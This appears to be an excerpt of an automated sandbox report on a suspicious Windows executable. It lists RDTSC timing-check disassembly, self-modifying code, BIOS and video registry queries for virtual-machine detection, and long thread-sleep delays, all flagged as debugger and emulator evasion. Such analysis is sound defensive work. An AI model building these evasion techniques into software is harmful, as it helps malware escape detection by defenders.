                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BAA second address: 7D4BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F7290766B26h 0x0000000c jns 00007F7290766B26h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F7290766B2Bh 0x0000001b pushad 0x0000001c jmp 00007F7290766B2Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E211E second address: 7E2135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7290C62CA6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E2135 second address: 7E2167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7290766B26h 0x00000008 jmp 00007F7290766B39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jl 00007F7290766B32h 0x00000016 jo 00007F7290766B2Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C47 second address: 7E1C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7290766B2Ah 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F7290766B28h 0x00000014 jg 00007F7290766B32h 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007F7290766B26h 0x00000022 jnl 00007F7290766B26h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DD8 second address: 7E1DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B36h 0x00000009 jg 00007F7290766B26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DFF second address: 7E1E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F7290C62CB7h 0x0000000d js 00007F7290C62CA8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E29 second address: 7E1E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290766B26h 0x0000000a jmp 00007F7290766B33h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E4D second address: 7E1E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E6704 second address: 7E6718 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F7290766B26h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA5D2 second address: 7EA5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA757 second address: 7EA767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA767 second address: 7EA778 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F7290766B26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABE9 second address: 7EAC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F7290C62CB2h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8C7A second address: 7F8CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 jmp 00007F7290766B2Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7290766B31h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8CAC second address: 7F8D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290C62CAFh 0x00000008 pop eax 0x00000009 js 00007F7290C62CD3h 0x0000000f jmp 00007F7290C62CB8h 0x00000014 jmp 00007F7290C62CB5h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F7290C62CAAh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF384 second address: 7EF3A8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF3AD second address: 7EF3CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F7290C62CA6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jbe 00007F7290C62CA8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F7290C62CD1h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 716C34 second address: 716C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32B1 second address: 6E32D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB0h 0x00000007 jmp 00007F7290C62CABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32D3 second address: 6E32F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B35h 0x00000009 jc 00007F7290766B26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32F4 second address: 6E3315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7290C62CABh 0x0000000d jmp 00007F7290C62CAEh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E3315 second address: 6E3321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E254A second address: 6E255B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7290766B26h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E255B second address: 6E25B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB7h 0x00000007 jno 00007F7290C62CAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F7290C62CA6h 0x0000001a jmp 00007F7290C62CABh 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F7290C62CB6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E25B3 second address: 6E25D9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290766B40h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2714 second address: 6E275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB6h 0x00000009 pop esi 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7290C62CB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F7290C62CA6h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A50 second address: 6E2A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7290C62CFAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7290C62CADh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A7E second address: 6E2A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 je 00007F7290766B26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F1D second address: 6E5F27 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F27 second address: 6E5F59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7290C62CB4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F7290C62CAAh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F59 second address: 6E5FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F7290766B32h 0x00000011 jo 00007F7290766B2Ch 0x00000017 jne 00007F7290766B26h 0x0000001d pop eax 0x0000001e add ecx, 638A2B8Eh 0x00000024 push 00000003h 0x00000026 and edi, 1002DD7Bh 0x0000002c push esi 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 mov edi, esi 0x00000032 push 00000003h 0x00000034 jp 00007F7290766B29h 0x0000003a or dh, FFFFFF9Dh 0x0000003d jmp 00007F7290766B30h 0x00000042 push 7C298416h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a pushad 0x0000004b popad 0x0000004c pop eax 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FB1 second address: 6E5FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FC1 second address: 6E5FFA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 43D67BEAh 0x00000013 sub dword ptr [ebp+150D1FF0h], esi 0x00000019 lea ebx, dword ptr [ebp+15253D8Ch] 0x0000001f mov dword ptr [ebp+150D24C1h], edi 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 jmp 00007F7290766B2Fh 0x0000002e pop esi 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FFA second address: 6E6010 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290C62CA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F7290C62CA6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6054 second address: 6E60B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007F7290766B2Eh 0x0000000d nop 0x0000000e call 00007F7290766B31h 0x00000013 sub dword ptr [ebp+150D1FE6h], ecx 0x00000019 pop ecx 0x0000001a mov dx, 04A8h 0x0000001e push 00000000h 0x00000020 mov esi, dword ptr [ebp+150D2BEEh] 0x00000026 push 04ED1B32h 0x0000002b pushad 0x0000002c pushad 0x0000002d jmp 00007F7290766B39h 0x00000032 jng 00007F7290766B26h 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6289 second address: 6E62FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290766B30h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 6BAEA692h 0x00000012 mov edx, dword ptr [ebp+150D198Ch] 0x00000018 lea ebx, dword ptr [ebp+15253DA0h] 0x0000001e mov edi, 3BEA4B40h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 ja 00007F7290766B3Eh 0x0000002b push ecx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 jnp 00007F7290766B28h 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7290766B36h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D30 second address: 704D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F7290766B2Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704EC3 second address: 704ED7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7290C62CAEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7052DF second address: 70530B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7290C62CACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7290C62CB6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D08EB second address: 6D090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7290C62CB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705761 second address: 705775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B30h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70B04B second address: 70B063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSpecial instruction interceptor: First address: 735812 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSpecial instruction interceptor: First address: 7128A3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 5150000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 6F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 8201Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 1563Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 9729Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37117s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36994s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36518s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36268s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36143s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36017s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35518s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35268s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35143s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35018s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34395s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34001s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33627s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33377s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4752Thread sleep count: 117 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4752Thread sleep time: -234117s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5320Thread sleep count: 110 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5320Thread sleep time: -220110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4072Thread sleep count: 135 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4072Thread sleep time: -270135s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6048Thread sleep time: -68000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 1288Thread sleep count: 131 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 1288Thread sleep time: -262131s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4708Thread sleep count: 121 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4708Thread sleep time: -242121s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6020Thread sleep count: 133 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6020Thread sleep time: -266133s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -22136092888451448s >= -30000sJump to behavior
